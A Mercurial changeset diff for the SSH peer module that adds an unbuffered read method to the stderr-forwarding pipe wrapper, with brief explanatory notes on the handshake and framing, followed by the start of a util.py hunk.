ssh: avoid reading beyond the end of stream when using compression...
Joerg Sonnenberger
r38735:27391d74 default
@@ -1,635 +1,646 @@ mercurial/sshpeer.py
1 1 # sshpeer.py - ssh repository proxy class for mercurial
2 2 #
3 3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import re
11 11 import uuid
12 12
13 13 from .i18n import _
14 14 from . import (
15 15 error,
16 16 pycompat,
17 17 util,
18 18 wireprotoserver,
19 19 wireprototypes,
20 20 wireprotov1peer,
21 21 wireprotov1server,
22 22 )
23 23 from .utils import (
24 24 procutil,
25 25 stringutil,
26 26 )
27 27
28 28 def _serverquote(s):
29 29 """quote a string for the remote shell ... which we assume is sh"""
30 30 if not s:
31 31 return s
32 32 if re.match('[a-zA-Z0-9@%_+=:,./-]*$', s):
33 33 return s
34 34 return "'%s'" % s.replace("'", "'\\''")
35 35
36 36 def _forwardoutput(ui, pipe):
37 37 """display all data currently available on pipe as remote output.
38 38
39 39 This is non-blocking."""
40 40 if pipe:
41 41 s = procutil.readpipe(pipe)
42 42 if s:
43 43 for l in s.splitlines():
44 44 ui.status(_("remote: "), l, '\n')
45 45
46 46 class doublepipe(object):
47 47 """Operate a side-channel pipe in addition of a main one
48 48
49 49 The side-channel pipe contains server output to be forwarded to the
50 50 user. The double pipe will behave as the "main" pipe, but will ensure the
51 51 content of the "side" pipe is properly processed while we wait for a
52 52 blocking call on the "main" pipe.
53 53
54 54 If large amounts of data are read from "main", the forwarding will cease
55 55 after the first bytes start to appear. This simplifies the implementation
56 56 without affecting the actual output of sshpeer too much, as we rarely
57 57 issue a large read for data not yet emitted by the server.
58 58
59 59 The main pipe is expected to be a 'bufferedinputpipe' from the util module
60 60 that handles all the OS-specific bits. This class lives in this module
61 61 because it focuses on behavior specific to the ssh protocol."""
62 62
63 63 def __init__(self, ui, main, side):
64 64 self._ui = ui
65 65 self._main = main
66 66 self._side = side
67 67
68 68 def _wait(self):
69 69 """wait until some data are available on main or side
70 70
71 71 return a pair of booleans (ismainready, issideready)
72 72
73 73 (This will only wait for data if the setup is supported by `util.poll`)
74 74 """
75 75 if (isinstance(self._main, util.bufferedinputpipe) and
76 76 self._main.hasbuffer):
77 77 # Main has data. Assume side is worth poking at.
78 78 return True, True
79 79
80 80 fds = [self._main.fileno(), self._side.fileno()]
81 81 try:
82 82 act = util.poll(fds)
83 83 except NotImplementedError:
84 84 # not supported yet; assume all have data.
85 85 act = fds
86 86 return (self._main.fileno() in act, self._side.fileno() in act)
87 87
88 88 def write(self, data):
89 89 return self._call('write', data)
90 90
91 91 def read(self, size):
92 92 r = self._call('read', size)
93 93 if size != 0 and not r:
94 94 # We've observed a condition that indicates the
95 95 # stdout closed unexpectedly. Check stderr one
96 96 # more time and snag anything that's there before
97 97 # letting anyone know the main part of the pipe
98 98 # closed prematurely.
99 99 _forwardoutput(self._ui, self._side)
100 100 return r
101 101
102 def unbufferedread(self, size):
103 r = self._call('unbufferedread', size)
104 if size != 0 and not r:
105 # We've observed a condition that indicates the
106 # stdout closed unexpectedly. Check stderr one
107 # more time and snag anything that's there before
108 # letting anyone know the main part of the pipe
109 # closed prematurely.
110 _forwardoutput(self._ui, self._side)
111 return r
112
102 113 def readline(self):
103 114 return self._call('readline')
104 115
105 116 def _call(self, methname, data=None):
106 117 """call <methname> on "main", forward output of "side" while blocking
107 118 """
108 119 # data can be '' or 0
109 120 if (data is not None and not data) or self._main.closed:
110 121 _forwardoutput(self._ui, self._side)
111 122 return ''
112 123 while True:
113 124 mainready, sideready = self._wait()
114 125 if sideready:
115 126 _forwardoutput(self._ui, self._side)
116 127 if mainready:
117 128 meth = getattr(self._main, methname)
118 129 if data is None:
119 130 return meth()
120 131 else:
121 132 return meth(data)
122 133
123 134 def close(self):
124 135 return self._main.close()
125 136
126 137 def flush(self):
127 138 return self._main.flush()
128 139
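
For orientation, a minimal sketch of how this wrapper is wired up, mirroring sshv1peer.__init__ further down (the raw pipe objects here are hypothetical stand-ins):

    # stdout carries protocol data; stderr carries server diagnostics.
    stdout = doublepipe(ui, util.bufferedinputpipe(rawstdout), stderr)
    stdin = doublepipe(ui, rawstdin, stderr)
    data = stdout.read(4096)  # any pending stderr is forwarded while we block
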
129 140 def _cleanuppipes(ui, pipei, pipeo, pipee):
130 141 """Clean up pipes used by an SSH connection."""
131 142 if pipeo:
132 143 pipeo.close()
133 144 if pipei:
134 145 pipei.close()
135 146
136 147 if pipee:
137 148 # Try to read from the err descriptor until EOF.
138 149 try:
139 150 for l in pipee:
140 151 ui.status(_('remote: '), l)
141 152 except (IOError, ValueError):
142 153 pass
143 154
144 155 pipee.close()
145 156
146 157 def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None):
147 158 """Create an SSH connection to a server.
148 159
149 160 Returns a tuple of (process, stdin, stdout, stderr) for the
150 161 spawned process.
151 162 """
152 163 cmd = '%s %s %s' % (
153 164 sshcmd,
154 165 args,
155 166 procutil.shellquote('%s -R %s serve --stdio' % (
156 167 _serverquote(remotecmd), _serverquote(path))))
157 168
158 169 ui.debug('running %s\n' % cmd)
159 170 cmd = procutil.quotecommand(cmd)
160 171
161 172 # no buffering allows the use of 'select'
162 173 # feel free to remove buffering and select usage when we ultimately
163 174 # move to threading.
164 175 stdin, stdout, stderr, proc = procutil.popen4(cmd, bufsize=0, env=sshenv)
165 176
166 177 return proc, stdin, stdout, stderr
167 178
168 179 def _clientcapabilities():
169 180 """Return list of capabilities of this client.
170 181
171 182 Returns a list of capabilities that are supported by this client.
172 183 """
173 184 protoparams = {'partial-pull'}
174 185 comps = [e.wireprotosupport().name for e in
175 186 util.compengines.supportedwireengines(util.CLIENTROLE)]
176 187 protoparams.add('comp=%s' % ','.join(comps))
177 188 return protoparams
178 189
179 190 def _performhandshake(ui, stdin, stdout, stderr):
180 191 def badresponse():
181 192 # Flush any output on stderr.
182 193 _forwardoutput(ui, stderr)
183 194
184 195 msg = _('no suitable response from remote hg')
185 196 hint = ui.config('ui', 'ssherrorhint')
186 197 raise error.RepoError(msg, hint=hint)
187 198
188 199 # The handshake consists of sending wire protocol commands in reverse
189 200 # order of protocol implementation and then sniffing for a response
190 201 # to one of them.
191 202 #
192 203 # Those commands (from oldest to newest) are:
193 204 #
194 205 # ``between``
195 206 # Asks for the set of revisions between a pair of revisions. Command
196 207 # present in all Mercurial server implementations.
197 208 #
198 209 # ``hello``
199 210 # Instructs the server to advertise its capabilities. Introduced in
200 211 # Mercurial 0.9.1.
201 212 #
202 213 # ``upgrade``
203 214 # Requests upgrade from default transport protocol version 1 to
204 215 # a newer version. Introduced in Mercurial 4.6 as an experimental
205 216 # feature.
206 217 #
207 218 # The ``between`` command is issued with a request for the null
208 219 # range. If the remote is a Mercurial server, this request will
209 220 # generate a specific response: ``1\n\n``. This represents the
210 221 # wire protocol encoded value for ``\n``. We look for ``1\n\n``
211 222 # in the output stream and know this is the response to ``between``
212 223 # and we're at the end of our handshake reply.
213 224 #
214 225 # The response to the ``hello`` command will be a line with the
215 226 # length of the value returned by that command followed by that
216 227 # value. If the server doesn't support ``hello`` (which should be
217 228 # rare), that line will be ``0\n``. Otherwise, the value will contain
218 229 # RFC 822 like lines. Of these, the ``capabilities:`` line contains
219 230 # the capabilities of the server.
220 231 #
221 232 # The ``upgrade`` command isn't really a command in the traditional
222 233 # sense of version 1 of the transport because it isn't using the
223 234 # proper mechanism for formatting: instead, it just encodes
224 235 # arguments on the line, delimited by spaces.
225 236 #
226 237 # The ``upgrade`` line looks like ``upgrade <token> <capabilities>``.
227 238 # If the server doesn't support protocol upgrades, it will reply to
228 239 # this line with ``0\n``. Otherwise, it emits an
229 240 # ``upgraded <token> <protocol>`` line to both stdout and stderr.
230 241 # Content immediately following this line describes additional
231 242 # protocol and server state.
232 243 #
233 244 # In addition to the responses to our command requests, the server
234 245 # may emit "banner" output on stdout. SSH servers are allowed to
235 246 # print messages to stdout on login. Issuing commands on connection
236 247 # allows us to flush this banner output from the server by scanning
237 248 # for output to our well-known ``between`` command. Of course, if
238 249 # the banner contains ``1\n\n``, this will throw off our detection.
239 250
240 251 requestlog = ui.configbool('devel', 'debug.peer-request')
241 252
242 253 # Generate a random token to help identify responses to version 2
243 254 # upgrade request.
244 255 token = pycompat.sysbytes(str(uuid.uuid4()))
245 256 upgradecaps = [
246 257 ('proto', wireprotoserver.SSHV2),
247 258 ]
248 259 upgradecaps = util.urlreq.urlencode(upgradecaps)
249 260
250 261 try:
251 262 pairsarg = '%s-%s' % ('0' * 40, '0' * 40)
252 263 handshake = [
253 264 'hello\n',
254 265 'between\n',
255 266 'pairs %d\n' % len(pairsarg),
256 267 pairsarg,
257 268 ]
258 269
259 270 # Request upgrade to version 2 if configured.
260 271 if ui.configbool('experimental', 'sshpeer.advertise-v2'):
261 272 ui.debug('sending upgrade request: %s %s\n' % (token, upgradecaps))
262 273 handshake.insert(0, 'upgrade %s %s\n' % (token, upgradecaps))
263 274
264 275 if requestlog:
265 276 ui.debug('devel-peer-request: hello+between\n')
266 277 ui.debug('devel-peer-request: pairs: %d bytes\n' % len(pairsarg))
267 278 ui.debug('sending hello command\n')
268 279 ui.debug('sending between command\n')
269 280
270 281 stdin.write(''.join(handshake))
271 282 stdin.flush()
272 283 except IOError:
273 284 badresponse()
274 285
275 286 # Assume version 1 of wire protocol by default.
276 287 protoname = wireprototypes.SSHV1
277 288 reupgraded = re.compile(b'^upgraded %s (.*)$' % stringutil.reescape(token))
278 289
279 290 lines = ['', 'dummy']
280 291 max_noise = 500
281 292 while lines[-1] and max_noise:
282 293 try:
283 294 l = stdout.readline()
284 295 _forwardoutput(ui, stderr)
285 296
286 297 # Look for reply to protocol upgrade request. It has a token
287 298 # in it, so there should be no false positives.
288 299 m = reupgraded.match(l)
289 300 if m:
290 301 protoname = m.group(1)
291 302 ui.debug('protocol upgraded to %s\n' % protoname)
292 303 # If an upgrade was handled, the ``hello`` and ``between``
293 304 # requests are ignored. The next output belongs to the
294 305 # protocol, so stop scanning lines.
295 306 break
296 307
297 308 # Otherwise it could be a banner, or a ``0\n`` response if the server
298 309 # doesn't support upgrade.
299 310
300 311 if lines[-1] == '1\n' and l == '\n':
301 312 break
302 313 if l:
303 314 ui.debug('remote: ', l)
304 315 lines.append(l)
305 316 max_noise -= 1
306 317 except IOError:
307 318 badresponse()
308 319 else:
309 320 badresponse()
310 321
311 322 caps = set()
312 323
313 324 # For version 1, we should see a ``capabilities`` line in response to the
314 325 # ``hello`` command.
315 326 if protoname == wireprototypes.SSHV1:
316 327 for l in reversed(lines):
317 328 # Look for response to ``hello`` command. Scan from the back so
318 329 # we don't misinterpret banner output as the command reply.
319 330 if l.startswith('capabilities:'):
320 331 caps.update(l[:-1].split(':')[1].split())
321 332 break
322 333 elif protoname == wireprotoserver.SSHV2:
323 334 # We see a line with the number of bytes to follow and then a value
324 335 # looking like ``capabilities: *``.
325 336 line = stdout.readline()
326 337 try:
327 338 valuelen = int(line)
328 339 except ValueError:
329 340 badresponse()
330 341
331 342 capsline = stdout.read(valuelen)
332 343 if not capsline.startswith('capabilities: '):
333 344 badresponse()
334 345
335 346 ui.debug('remote: %s\n' % capsline)
336 347
337 348 caps.update(capsline.split(':')[1].split())
338 349 # Trailing newline.
339 350 stdout.read(1)
340 351
341 352 # Error if we couldn't find capabilities. This means one of:
342 353 #
343 354 # 1. Remote isn't a Mercurial server
344 355 # 2. Remote is a <0.9.1 Mercurial server
345 356 # 3. Remote is a future Mercurial server that dropped ``hello``
346 357 # and other attempted handshake mechanisms.
347 358 if not caps:
348 359 badresponse()
349 360
350 361 # Flush any output on stderr before proceeding.
351 362 _forwardoutput(ui, stderr)
352 363
353 364 return protoname, caps
354 365
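
As a concrete illustration of the handshake described above, here is the byte stream for a plain version 1 exchange (schematic values, not captured from a real session):

    # client -> server (one buffered write):
    #   hello\n
    #   between\n
    #   pairs 81\n
    #   0000...0000-0000...0000        (two 40-character null node ids)
    # server -> client:
    #   <length>\n
    #   capabilities: lookup branchmap ...\n   (reply to ``hello``)
    #   1\n
    #   \n                             (reply to ``between``: the sniffed 1\n\n)
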
355 366 class sshv1peer(wireprotov1peer.wirepeer):
356 367 def __init__(self, ui, url, proc, stdin, stdout, stderr, caps,
357 368 autoreadstderr=True):
358 369 """Create a peer from an existing SSH connection.
359 370
360 371 ``proc`` is a handle on the underlying SSH process.
361 372 ``stdin``, ``stdout``, and ``stderr`` are handles on the stdio
362 373 pipes for that process.
363 374 ``caps`` is a set of capabilities supported by the remote.
364 375 ``autoreadstderr`` denotes whether to automatically read from
365 376 stderr and to forward its output.
366 377 """
367 378 self._url = url
368 379 self.ui = ui
369 380 # self._subprocess is unused. Keeping a handle on the process
370 381 # holds a reference and prevents it from being garbage collected.
371 382 self._subprocess = proc
372 383
373 384 # And we hook up our "doublepipe" wrapper to allow querying
374 385 # stderr any time we perform I/O.
375 386 if autoreadstderr:
376 387 stdout = doublepipe(ui, util.bufferedinputpipe(stdout), stderr)
377 388 stdin = doublepipe(ui, stdin, stderr)
378 389
379 390 self._pipeo = stdin
380 391 self._pipei = stdout
381 392 self._pipee = stderr
382 393 self._caps = caps
383 394 self._autoreadstderr = autoreadstderr
384 395
385 396 # Commands that have a "framed" response where the first line of the
386 397 # response contains the length of that response.
387 398 _FRAMED_COMMANDS = {
388 399 'batch',
389 400 }
390 401
391 402 # Begin of ipeerconnection interface.
392 403
393 404 def url(self):
394 405 return self._url
395 406
396 407 def local(self):
397 408 return None
398 409
399 410 def peer(self):
400 411 return self
401 412
402 413 def canpush(self):
403 414 return True
404 415
405 416 def close(self):
406 417 pass
407 418
408 419 # End of ipeerconnection interface.
409 420
410 421 # Begin of ipeercommands interface.
411 422
412 423 def capabilities(self):
413 424 return self._caps
414 425
415 426 # End of ipeercommands interface.
416 427
417 428 def _readerr(self):
418 429 _forwardoutput(self.ui, self._pipee)
419 430
420 431 def _abort(self, exception):
421 432 self._cleanup()
422 433 raise exception
423 434
424 435 def _cleanup(self):
425 436 _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee)
426 437
427 438 __del__ = _cleanup
428 439
429 440 def _sendrequest(self, cmd, args, framed=False):
430 441 if (self.ui.debugflag
431 442 and self.ui.configbool('devel', 'debug.peer-request')):
432 443 dbg = self.ui.debug
433 444 line = 'devel-peer-request: %s\n'
434 445 dbg(line % cmd)
435 446 for key, value in sorted(args.items()):
436 447 if not isinstance(value, dict):
437 448 dbg(line % ' %s: %d bytes' % (key, len(value)))
438 449 else:
439 450 for dk, dv in sorted(value.items()):
440 451 dbg(line % ' %s-%s: %d' % (key, dk, len(dv)))
441 452 self.ui.debug("sending %s command\n" % cmd)
442 453 self._pipeo.write("%s\n" % cmd)
443 454 _func, names = wireprotov1server.commands[cmd]
444 455 keys = names.split()
445 456 wireargs = {}
446 457 for k in keys:
447 458 if k == '*':
448 459 wireargs['*'] = args
449 460 break
450 461 else:
451 462 wireargs[k] = args[k]
452 463 del args[k]
453 464 for k, v in sorted(wireargs.iteritems()):
454 465 self._pipeo.write("%s %d\n" % (k, len(v)))
455 466 if isinstance(v, dict):
456 467 for dk, dv in v.iteritems():
457 468 self._pipeo.write("%s %d\n" % (dk, len(dv)))
458 469 self._pipeo.write(dv)
459 470 else:
460 471 self._pipeo.write(v)
461 472 self._pipeo.flush()
462 473
463 474 # We know exactly how many bytes are in the response. So return a proxy
464 475 # around the raw output stream that allows reading exactly this many
465 476 # bytes. Callers then can read() without fear of overrunning the
466 477 # response.
467 478 if framed:
468 479 amount = self._getamount()
469 480 return util.cappedreader(self._pipei, amount)
470 481
471 482 return self._pipei
472 483
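
The wire encoding produced above, sketched for a hypothetical call to the ``lookup`` command with a single argument:

    # self._sendrequest('lookup', {'key': 'tip'}, framed=True) writes:
    #   lookup\n
    #   key 3\n
    #   tip
    # and then reads a framed response via _getamount() (see below).
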
473 484 def _callstream(self, cmd, **args):
474 485 args = pycompat.byteskwargs(args)
475 486 return self._sendrequest(cmd, args, framed=cmd in self._FRAMED_COMMANDS)
476 487
477 488 def _callcompressable(self, cmd, **args):
478 489 args = pycompat.byteskwargs(args)
479 490 return self._sendrequest(cmd, args, framed=cmd in self._FRAMED_COMMANDS)
480 491
481 492 def _call(self, cmd, **args):
482 493 args = pycompat.byteskwargs(args)
483 494 return self._sendrequest(cmd, args, framed=True).read()
484 495
485 496 def _callpush(self, cmd, fp, **args):
486 497 # The server responds with an empty frame if the client should
487 498 # continue submitting the payload.
488 499 r = self._call(cmd, **args)
489 500 if r:
490 501 return '', r
491 502
492 503 # The payload consists of frames with content followed by an empty
493 504 # frame.
494 505 for d in iter(lambda: fp.read(4096), ''):
495 506 self._writeframed(d)
496 507 self._writeframed("", flush=True)
497 508
498 509 # In case of success, there is an empty frame and a frame containing
499 510 # the integer result (as a string).
500 511 # In case of error, there is a non-empty frame containing the error.
501 512 r = self._readframed()
502 513 if r:
503 514 return '', r
504 515 return self._readframed(), ''
505 516
506 517 def _calltwowaystream(self, cmd, fp, **args):
507 518 # The server responds with an empty frame if the client should
508 519 # continue submitting the payload.
509 520 r = self._call(cmd, **args)
510 521 if r:
511 522 # XXX needs to be made better
512 523 raise error.Abort(_('unexpected remote reply: %s') % r)
513 524
514 525 # The payload consists of frames with content followed by an empty
515 526 # frame.
516 527 for d in iter(lambda: fp.read(4096), ''):
517 528 self._writeframed(d)
518 529 self._writeframed("", flush=True)
519 530
520 531 return self._pipei
521 532
522 533 def _getamount(self):
523 534 l = self._pipei.readline()
524 535 if l == '\n':
525 536 if self._autoreadstderr:
526 537 self._readerr()
527 538 msg = _('check previous remote output')
528 539 self._abort(error.OutOfBandError(hint=msg))
529 540 if self._autoreadstderr:
530 541 self._readerr()
531 542 try:
532 543 return int(l)
533 544 except ValueError:
534 545 self._abort(error.ResponseError(_("unexpected response:"), l))
535 546
536 547 def _readframed(self):
537 548 size = self._getamount()
538 549 if not size:
539 550 return b''
540 551
541 552 return self._pipei.read(size)
542 553
543 554 def _writeframed(self, data, flush=False):
544 555 self._pipeo.write("%d\n" % len(data))
545 556 if data:
546 557 self._pipeo.write(data)
547 558 if flush:
548 559 self._pipeo.flush()
549 560 if self._autoreadstderr:
550 561 self._readerr()
551 562
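
Frames, as written by _writeframed and consumed by _readframed, are a decimal length line followed by that many bytes of payload; an empty frame terminates a payload stream. For example:

    # _writeframed('abc') emits:            3\nabc
    # _writeframed('', flush=True) emits:   0\n
    # _readframed() reads the length line with _getamount(), then exactly
    # that many bytes, so callers never overrun the response.
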
552 563 class sshv2peer(sshv1peer):
553 564 """A peer that speakers version 2 of the transport protocol."""
554 565 # Currently version 2 is identical to version 1 post handshake.
555 566 # And handshake is performed before the peer is instantiated. So
556 567 # we need no custom code.
557 568
558 569 def makepeer(ui, path, proc, stdin, stdout, stderr, autoreadstderr=True):
559 570 """Make a peer instance from existing pipes.
560 571
561 572 ``path`` and ``proc`` are stored on the eventual peer instance and may
562 573 not be used for anything meaningful.
563 574
564 575 ``stdin``, ``stdout``, and ``stderr`` are the pipes connected to the
565 576 SSH server's stdio handles.
566 577
567 578 This function is factored out to allow creating peers that don't
568 579 actually spawn a new process. It is useful for starting SSH protocol
569 580 servers and clients via non-standard means, which can be useful for
570 581 testing.
571 582 """
572 583 try:
573 584 protoname, caps = _performhandshake(ui, stdin, stdout, stderr)
574 585 except Exception:
575 586 _cleanuppipes(ui, stdout, stdin, stderr)
576 587 raise
577 588
578 589 if protoname == wireprototypes.SSHV1:
579 590 return sshv1peer(ui, path, proc, stdin, stdout, stderr, caps,
580 591 autoreadstderr=autoreadstderr)
581 592 elif protoname == wireprototypes.SSHV2:
582 593 return sshv2peer(ui, path, proc, stdin, stdout, stderr, caps,
583 594 autoreadstderr=autoreadstderr)
584 595 else:
585 596 _cleanuppipes(ui, stdout, stdin, stderr)
586 597 raise error.RepoError(_('unknown version of SSH protocol: %s') %
587 598 protoname)
588 599
589 600 def instance(ui, path, create, intents=None):
590 601 """Create an SSH peer.
591 602
592 603 The returned object conforms to the ``wireprotov1peer.wirepeer`` interface.
593 604 """
594 605 u = util.url(path, parsequery=False, parsefragment=False)
595 606 if u.scheme != 'ssh' or not u.host or u.path is None:
596 607 raise error.RepoError(_("couldn't parse location %s") % path)
597 608
598 609 util.checksafessh(path)
599 610
600 611 if u.passwd is not None:
601 612 raise error.RepoError(_('password in URL not supported'))
602 613
603 614 sshcmd = ui.config('ui', 'ssh')
604 615 remotecmd = ui.config('ui', 'remotecmd')
605 616 sshaddenv = dict(ui.configitems('sshenv'))
606 617 sshenv = procutil.shellenviron(sshaddenv)
607 618 remotepath = u.path or '.'
608 619
609 620 args = procutil.sshargs(sshcmd, u.host, u.user, u.port)
610 621
611 622 if create:
612 623 cmd = '%s %s %s' % (sshcmd, args,
613 624 procutil.shellquote('%s init %s' %
614 625 (_serverquote(remotecmd), _serverquote(remotepath))))
615 626 ui.debug('running %s\n' % cmd)
616 627 res = ui.system(cmd, blockedtag='sshpeer', environ=sshenv)
617 628 if res != 0:
618 629 raise error.RepoError(_('could not create remote repo'))
619 630
620 631 proc, stdin, stdout, stderr = _makeconnection(ui, sshcmd, args, remotecmd,
621 632 remotepath, sshenv)
622 633
623 634 peer = makepeer(ui, path, proc, stdin, stdout, stderr)
624 635
625 636 # Finally, if supported by the server, notify it about our own
626 637 # capabilities.
627 638 if 'protocaps' in peer.capabilities():
628 639 try:
629 640 peer._call("protocaps",
630 641 caps=' '.join(sorted(_clientcapabilities())))
631 642 except IOError:
632 643 peer._cleanup()
633 644 raise error.RepoError(_('capability exchange failed'))
634 645
635 646 return peer
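
A hedged usage sketch for this entry point (the URL and repository path are invented for illustration):

    # ``ui`` is a mercurial.ui.ui instance. instance() validates the URL,
    # spawns ``ssh ... hg -R <path> serve --stdio``, performs the handshake,
    # and returns an sshv1peer or sshv2peer.
    peer = instance(ui, b'ssh://user@example.com//srv/repo', create=False)
    caps = peer.capabilities()
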
@@ -1,3757 +1,3838 @@ mercurial/util.py
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from . import (
40 40 encoding,
41 41 error,
42 42 i18n,
43 43 node as nodemod,
44 44 policy,
45 45 pycompat,
46 46 urllibcompat,
47 47 )
48 48 from .utils import (
49 49 procutil,
50 50 stringutil,
51 51 )
52 52
53 53 base85 = policy.importmod(r'base85')
54 54 osutil = policy.importmod(r'osutil')
55 55 parsers = policy.importmod(r'parsers')
56 56
57 57 b85decode = base85.b85decode
58 58 b85encode = base85.b85encode
59 59
60 60 cookielib = pycompat.cookielib
61 61 httplib = pycompat.httplib
62 62 pickle = pycompat.pickle
63 63 safehasattr = pycompat.safehasattr
64 64 socketserver = pycompat.socketserver
65 65 bytesio = pycompat.bytesio
66 66 # TODO deprecate stringio name, as it is a lie on Python 3.
67 67 stringio = bytesio
68 68 xmlrpclib = pycompat.xmlrpclib
69 69
70 70 httpserver = urllibcompat.httpserver
71 71 urlerr = urllibcompat.urlerr
72 72 urlreq = urllibcompat.urlreq
73 73
74 74 # workaround for win32mbcs
75 75 _filenamebytestr = pycompat.bytestr
76 76
77 77 if pycompat.iswindows:
78 78 from . import windows as platform
79 79 else:
80 80 from . import posix as platform
81 81
82 82 _ = i18n._
83 83
84 84 bindunixsocket = platform.bindunixsocket
85 85 cachestat = platform.cachestat
86 86 checkexec = platform.checkexec
87 87 checklink = platform.checklink
88 88 copymode = platform.copymode
89 89 expandglobs = platform.expandglobs
90 90 getfsmountpoint = platform.getfsmountpoint
91 91 getfstype = platform.getfstype
92 92 groupmembers = platform.groupmembers
93 93 groupname = platform.groupname
94 94 isexec = platform.isexec
95 95 isowner = platform.isowner
96 96 listdir = osutil.listdir
97 97 localpath = platform.localpath
98 98 lookupreg = platform.lookupreg
99 99 makedir = platform.makedir
100 100 nlinks = platform.nlinks
101 101 normpath = platform.normpath
102 102 normcase = platform.normcase
103 103 normcasespec = platform.normcasespec
104 104 normcasefallback = platform.normcasefallback
105 105 openhardlinks = platform.openhardlinks
106 106 oslink = platform.oslink
107 107 parsepatchoutput = platform.parsepatchoutput
108 108 pconvert = platform.pconvert
109 109 poll = platform.poll
110 110 posixfile = platform.posixfile
111 111 rename = platform.rename
112 112 removedirs = platform.removedirs
113 113 samedevice = platform.samedevice
114 114 samefile = platform.samefile
115 115 samestat = platform.samestat
116 116 setflags = platform.setflags
117 117 split = platform.split
118 118 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
119 119 statisexec = platform.statisexec
120 120 statislink = platform.statislink
121 121 umask = platform.umask
122 122 unlink = platform.unlink
123 123 username = platform.username
124 124
125 125 try:
126 126 recvfds = osutil.recvfds
127 127 except AttributeError:
128 128 pass
129 129
130 130 # Python compatibility
131 131
132 132 _notset = object()
133 133
134 134 def bitsfrom(container):
135 135 bits = 0
136 136 for bit in container:
137 137 bits |= bit
138 138 return bits
139 139
140 140 # Python 2.6 still has deprecation warnings enabled by default. We do not
141 141 # want to display anything to a standard user, so detect if we are running
142 142 # tests and only use Python deprecation warnings in this case.
143 143 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
144 144 if _dowarn:
145 145 # explicitly unfilter our warning for python 2.7
146 146 #
147 147 # The option of setting PYTHONWARNINGS in the test runner was investigated.
148 148 # However, module name set through PYTHONWARNINGS was exactly matched, so
149 149 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
150 150 # makes the whole PYTHONWARNINGS thing useless for our usecase.
151 151 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
152 152 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
153 153 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
154 154 if _dowarn and pycompat.ispy3:
155 155 # silence warning emitted by passing user string to re.sub()
156 156 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
157 157 r'mercurial')
158 158 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
159 159 DeprecationWarning, r'mercurial')
160 160 # TODO: reinvent imp.is_frozen()
161 161 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
162 162 DeprecationWarning, r'mercurial')
163 163
164 164 def nouideprecwarn(msg, version, stacklevel=1):
165 165 """Issue an python native deprecation warning
166 166
167 167 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
168 168 """
169 169 if _dowarn:
170 170 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
171 171 " update your code.)") % version
172 172 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
173 173
174 174 DIGESTS = {
175 175 'md5': hashlib.md5,
176 176 'sha1': hashlib.sha1,
177 177 'sha512': hashlib.sha512,
178 178 }
179 179 # List of digest types from strongest to weakest
180 180 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
181 181
182 182 for k in DIGESTS_BY_STRENGTH:
183 183 assert k in DIGESTS
184 184
185 185 class digester(object):
186 186 """helper to compute digests.
187 187
188 188 This helper can be used to compute one or more digests given their name.
189 189
190 190 >>> d = digester([b'md5', b'sha1'])
191 191 >>> d.update(b'foo')
192 192 >>> [k for k in sorted(d)]
193 193 ['md5', 'sha1']
194 194 >>> d[b'md5']
195 195 'acbd18db4cc2f85cedef654fccc4a4d8'
196 196 >>> d[b'sha1']
197 197 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
198 198 >>> digester.preferred([b'md5', b'sha1'])
199 199 'sha1'
200 200 """
201 201
202 202 def __init__(self, digests, s=''):
203 203 self._hashes = {}
204 204 for k in digests:
205 205 if k not in DIGESTS:
206 206 raise error.Abort(_('unknown digest type: %s') % k)
207 207 self._hashes[k] = DIGESTS[k]()
208 208 if s:
209 209 self.update(s)
210 210
211 211 def update(self, data):
212 212 for h in self._hashes.values():
213 213 h.update(data)
214 214
215 215 def __getitem__(self, key):
216 216 if key not in DIGESTS:
217 217 raise error.Abort(_('unknown digest type: %s') % key)
218 218 return nodemod.hex(self._hashes[key].digest())
219 219
220 220 def __iter__(self):
221 221 return iter(self._hashes)
222 222
223 223 @staticmethod
224 224 def preferred(supported):
225 225 """returns the strongest digest type in both supported and DIGESTS."""
226 226
227 227 for k in DIGESTS_BY_STRENGTH:
228 228 if k in supported:
229 229 return k
230 230 return None
231 231
232 232 class digestchecker(object):
233 233 """file handle wrapper that additionally checks content against a given
234 234 size and digests.
235 235
236 236 d = digestchecker(fh, size, {'md5': '...'})
237 237
238 238 When multiple digests are given, all of them are validated.
239 239 """
240 240
241 241 def __init__(self, fh, size, digests):
242 242 self._fh = fh
243 243 self._size = size
244 244 self._got = 0
245 245 self._digests = dict(digests)
246 246 self._digester = digester(self._digests.keys())
247 247
248 248 def read(self, length=-1):
249 249 content = self._fh.read(length)
250 250 self._digester.update(content)
251 251 self._got += len(content)
252 252 return content
